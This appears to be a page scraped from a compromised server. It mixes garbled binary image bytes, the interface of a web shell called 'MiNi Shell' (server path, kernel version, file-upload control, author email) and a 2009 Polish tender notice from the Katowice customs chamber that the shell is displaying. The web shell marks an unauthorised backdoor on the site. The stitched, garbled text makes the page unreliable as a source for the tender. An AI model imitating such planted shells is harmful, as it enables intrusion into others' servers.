JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090427/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090427/121792-N-2009.html

<p class="kh_header"><b>Katowice: Pełnienie funkcji  Inwestora Zastępczego na zadaniu: Budowa nowej siedziby Izby Celnej w Katowicach przy ulicy Słonecznej 34</b><br>
<b>Numer ogłoszenia: 121792 - 2009; data zamieszczenia: 27.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> nieobowiązkowe</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Izba Celna w Katowicach , Plac Grunwaldzki 8-10, 40-127 Katowice, woj. śląskie, tel. 032 3587161, faks 032 3587204.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.katowice.ic.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pełnienie funkcji  Inwestora Zastępczego na zadaniu: Budowa nowej siedziby Izby Celnej w Katowicach przy ulicy Słonecznej 34.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest pełnienie funkcji Inwestora Zastępczego na zadaniu: Budowa nowej siedziby Izby Celnej w Katowicach przy ulicy Słonecznej 34 zlokalizowanej na działkach oznaczonych numerami: 11/4, 11/5, 32/5 w jednostce ewidencyjnej 246901-1 Miasto Katowice, obręb 001, dzielnica Śródmieście-Załęże wraz z wjazdami na drogi publiczne oraz infrastrukturą techniczną i przyłączami.
W zakresie zamierzenia inwestycyjnego znajduje się adaptacja istniejącego budynku szkieletowego zlokalizowanego przy ulicy Słonecznej na budynek biurowy, wybudowanie dwóch nowych budynków: magazynowo-garażowego oraz wiaty technicznej, wykonanie zjazdów z dróg publicznych oraz wewnętrznego układu komunikacyjnego wraz parkingami oraz infrastrukturą techniczna i z przyłączami, a także ogrodzeniem. Charakterystyka poszczególnych budynków:
3.1. Budynek biurowy;
- powierzchnia zabudowy - 1134,15m2,
- powierzchnia netto - 5444,55m2,
- kubatura brutto - 26978,10m3,
- wymiary gabarytowe/dłxszerxwys/ - 55,90 x 25,76 x 28,90,
3.2. Budynek magazynowo - garażowy;
- powierzchnia zabudowy - 751,50m2,
- powierzchnia netto - 680,65m2,
- kubatura brutto - 5182,00m3,
- wymiary gabarytowe/dłxszerxwys/ - 41,78 x 18,88 x 7,22,
3.3. Wiata techniczna;
- powierzchnia zabudowy - 39,70m2,
- powierzchnia netto - 32,15m2,
- kubatura brutto - 99,23m3,
- wymiary gabarytowe/dłxszerxwys/ - 16,20 x 2,45 x 2,50,
Szczegółowy opis ww. inwestycji zawiera dokumentacja projektowa i specyfikacja techniczna wykonania i odbioru robót budowlanych, z którą można się zapoznać w siedzibie Zamawiającego. Projekt budowlany jest dostępny w formie elektronicznej na stronie internetowej Zamawiającego.
Do obowiązków Inwestora Zastępczego będzie należało, między innymi:
1) przekazanie wykonawcy robót budowlanych terenu budowy wraz z przygotowaniem projektów i realizacją
umów na dostawę mediów niezbędnych do funkcjonowania zaplecza placu budowy;
2)powiadomienie odpowiednich organów o rozpoczęciu inwestycji;
3)nadzór nad prowadzeniem robót budowlanych;
4)prowadzenie wszelkich czynności związanych z rozliczaniem umowy z wykonawcą robót budowlanych oraz ewentualnymi innymi wykonawcami lub dostawcami, którzy będą uczestniczyć w realizacji inwestycji;
5)sporządzanie protokołów konieczności, sprawdzanie faktur oraz dokumentów niezbędnych do ich wystawienia zgodnie zapisami umowy na roboty budowlane;
6)opiniowanie wniosków wykonawcy robót budowlanych, kierownika budowy, projektanta sprawującego nadzór autorski, jak i samego Inwestora w sprawie zmian sposobu wykonywania robót budowlanych, oraz rozwiązań technicznych w stosunku do dokumentacji projektowej, w tym zmiany materiałów, urządzeń, przebiegu zmian tras mediów oraz uzyskanie zgody na powyższe zmiany autorów dokumentacji projektowej i przedstawienie
Inwestorowi uzasadnionych wniosków wraz z wyliczeniem kosztów wprowadzenia tych zmian;
7)organizacja i prowadzenie rad budowy oraz sporządzanie z nich protokołów;
8)zapewnienie zgodności wykonywanych robót i dostaw z technicznymi i umownymi wymaganiami;
9)rozwiązywanie problemów i sporów powstałych w trakcie realizacji inwestycji;
10)składanie Inwestorowi miesięcznych pisemnych raportów z przebiegu realizacji inwestycji;
11)dbałość o prawidłowy przebieg inwestycji, w tym warunków bezpieczeństwa i higieny pracy, ochronę mienia i zabezpieczenia przeciwpożarowego;
12)koordynowanie robót poszczególnych wykonawców gdy inwestycja będzie realizowana przez więcej niż jednego wykonawcę;
13)organizacja i dokonywanie wszelkich odbiorów wykonywanych robót (częściowych, robót zanikających, robót dodatkowych, robót zamiennych, ponaprawczego) oraz odbioru końcowego inwestycji;
14)podejmowanie, po uzgodnieniu z Inwestorem, decyzji w kwestii wad w wykonanej robocie budowlanej (inwestycji), w tym ustalenie wysokości ewentualnego obniżenia wynagrodzenia wykonawcy roboty budowlanej z tytułu wad;
15)nadzór nad usuwaniem wad i dokonanie odbioru ponaprawczego;
16)naliczanie i egzekwowanie w imieniu Inwestora kar umownych i odszkodowań zgodnie z umową o wykonanie roboty budowlanej;
17)przygotowanie wszystkich niezbędnych dokumentów do uzyskania decyzji pozwolenia na użytkowanie, w tym zapewnienie opracowania, na koszt Inwestora Zastępczego, świadectwa charakterystyki energetycznej dla obiektów wchodzących w skład inwestycji;
18)uzyskanie wszystkich wymaganych przepisami prawa decyzji administracyjnych, opinii, uzgodnień i uzyskanie w imieniu Inwestora pozwolenia na użytkowanie;
19)rozliczenie końcowe inwestycji;
20)wyegzekwowanie od wykonawcy roboty budowlanej sporządzenia karty gwarancyjnej na wykonaną inwestycję i Instrukcji użytkowania i eksploatacji obiektu;
21)sporządzenie i przekazanie Inwestorowi harmonogramu przeglądów gwarancyjnych;
Szczegółowy zakres obowiązków, które inwestor zastępczy będzie musiał wykonać w ramach zawartej umowy zawiera specyfikacja istotnych warunków zamówienia..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.54.00.00-5, 71.30.00.00-1, 71.31.00.00-4, 71.52.00.00-9.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.10.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający wymaga złożenia wadium w wysokości 8.000,00 zł (słownie: osiem tysięcy złotych 00/100).
Wadium należy wnieść w terminie do dnia 10.06.2009 r. do godz. 13:00<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Informacje i formalności konieczne do dokonania oceny spełniania wymogów:
O zamówienie publiczne mogą ubiegać się Wykonawcy, którzy spełniają niżej podane warunki: 1) Nie podlegają wykluczeniu na podstawie art. 24 ustawy Prawo zamówień publicznych; 2) Udokumentują pełnienia, tj. zakończenia, w ciągu ostatnich pięciu lat przed dniem wszczęcia postępowania funkcji inwestora zastępczego lub inżyniera kontraktu w odniesieniu do co najmniej 2 zakończonych i przekazanych do użytkowania robót budowlanych polegających na budowie lub przebudowie budynków użyteczności publicznej (zdefiniowanych w Rozporządzeniu Ministra Infrastruktury z dnia 12.04.2002 r. w sprawie warunków technicznych jakim
powinny odpowiadać budynki i ich usytuowanie - Dz. U. Nr 75, poz. 690), w tym jednego budynku o kubaturze nie mniejszej niż 10.000 m3 oraz o wartości co najmniej 10.000.000,00 zł; 3) Dysponują osobą zdolną do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia
osoby zdolnej do wykonania zamówienia, która będzie pełnić funkcję koordynatora inspektorów nadzoru inwestorskiego posiadającą uprawnienia budowlane w specjalności konstrukcyjno-budowlanej, z minimum 5-letnim stażem w pełnieniu funkcji kierownika budowy lub inspektora nadzoru; 4) Dysponują osobami zdolnymi
do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia tych osób, które będą pełnić funkcję inspektorów nadzoru inwestorskiego, posiadających uprawnienia budowlane w następujących specjalnościach: instalacyjnej w zakresie sieci i instalacji wodociągowych oraz kanalizacyjnych; instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych; instalacyjnej w zakresie sieci i instalacji cieplnych i wentylacyjnych; telekomunikacyjnej; drogowej. Zamawiający dopuszcza
połączenie ww. funkcji pod warunkiem spełnienia przez osobę łączącą te funkcje wszystkich warunków wymaganych dla poszczególnych funkcji. Ww. osoby muszą wykazać się znajomością języka polskiego w stopniu umożliwiającym swobodne porozumiewanie się w mowie i piśmie (dopuszcza się zmianę tego warunku
poprzez zatrudnienie przez Inwestora Zastępczego na własny koszt tłumacza języka polskiego, zapewniającego stałe i biegłe tłumaczenie wszelkich spotkań z udziałem tych osób). 

Zobowiązanie się wykonawców, w przypadku złożenia najkorzystniejszej oferty, do ubezpieczenia się od odpowiedzialności cywilnej w zakresie prowadzonej
działalności gospodarczej, w tym działalności zgodnej z przedmiotem niniejszego zamówienia na kwotę nie mniejszą niż 1 mln zł..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Dokumentami potwierdzającymi spełnianie warunków udziału w postępowaniu muszą być: -dla warunku 1): a)Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. b)Aktualne zaświadczenia właściwego naczelnika Urzędu Skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że Wykonawca
nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. c)Aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 Prawa zamówień publicznych - wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. d)Aktualna informacja z Krajowego Rejestru Karnego
w zakresie określonym w art. 24 ust. 1 pkt 9 Prawa zamówień publicznych - wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. -dla warunku 2): a)Sporządzony przez Wykonawcę wykaz zawierający następujące dane: nazwę, adres i telefon Zamawiającego, nazwę i adres obiektu,
opis nadzorowanych robót wraz z ich zakresem, w tym kubaturą, opis zakresu wykonywanych czynności związanych z pełnieniem funkcji inwestora zastępczego lub inżyniera kontraktu lub menadżera projektu, termin rozpoczęcia i zakończenia realizacji robót oraz ich wartość. Wykaz należy sporządzić zgodnie ze wzorem stanowiącym załącznik nr 3 do specyfikacji; b)Dokumenty potwierdzające, że pełnione funkcję inżyniera kontraktu lub inwestora zastępczego lub menadżera projektu pełniono należycie, np. referencje. -dla warunku 3 i 4): a)Sporządzony przez Wykonawcę - wg załącznika nr 4 do siwz wykaz, zawierający: imiona i
nazwiska osób, które będą sprawować odpowiednio funkcję koordynatora inspektorów nadzoru i inspektorów nadzoru wraz z ich stażem pracy związanym z pełnieniem funkcji kierownika budowy, kierownika robót lub inspektora nadzoru, kopię uprawnień budowlanych ww. osób oraz zaświadczenia z właściwych Izb Samorządu Zawodowego potwierdzające ich przynależność do danej Izby oraz posiadanie wymaganego ubezpieczenia od odpowiedzialności cywilnej, aktualnego na dzień składania ofert. UWAGA: Dodatkowo należy załączyć do oferty pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w w/w wykazie osób, Wykonawca wskazał osoby, którymi będzie dysponował. -Inne dokumenty wymagane przez Zamawiającego: a)Wypełniony Druk Oferta, stanowiący załącznik nr 2 do specyfikacji istotnych warunków
zamówienia. b)Kserokopia dowodu wpłaty wadium. UWAGA :
1) Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów dot. spełniania warunku 1 o których mowa w punktach a), b) i d) niniejszego ogłoszenia, składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
a)nie otwarto jego likwidacji ani nie ogłoszono upadłości;
b)nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu;
c) nie orzeczono wobec niego zakazu ubiegania się o zamówienie.
2) Natomiast zamiast dokumentu, o którym mowa w pkt c) niniejszego ogłoszenia Wykonawca składa zaświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy Prawo zamówień
publicznych. 
3) Dokumenty, o których mowa w tej UWADZE w punkcie 1)a, 1)c i 2) powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
Dokument, o którym mowa w tej UWADZE w punkcie 1)b, powinien być wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
4)Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w tej UWADZE w punktach 1) i 2), zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania.

Dokumentami potwierdzającymi spełnianie warunku udziału w postępowaniu musi być: Złożone w ofercie oświadczenie wykonawcy, że w przypadku uznania jego oferty za ofertę najkorzystniejszą, przedstawi, kopię polisy lub innego dokumentu ubezpieczenia potwierdzającego, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej, tj. pełnienia funkcji Inwestora Zastępczego na kwotę nie mniejszą niż 1.000.000,00 zł zgodnie z warunkami i ustalonymi we wzorze umowy..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.katowice.ic.gov.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Izba Celna w Katowicach, 40-127 Katowice, Pl. Grunwaldzki 8-10,.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.06.2009 godzina 13:00, miejsce: siedziba Zamawiającego, pok. nr 213, II piętro.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 60 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Ogłoszenie o zamówieniu zostało przekazane Urzędowi Oficjalnych Publikacji Wspólnot Europejskich w dniu 24.04.2009.

Creat By MiNi SheLL
Email: jattceo@gmail.com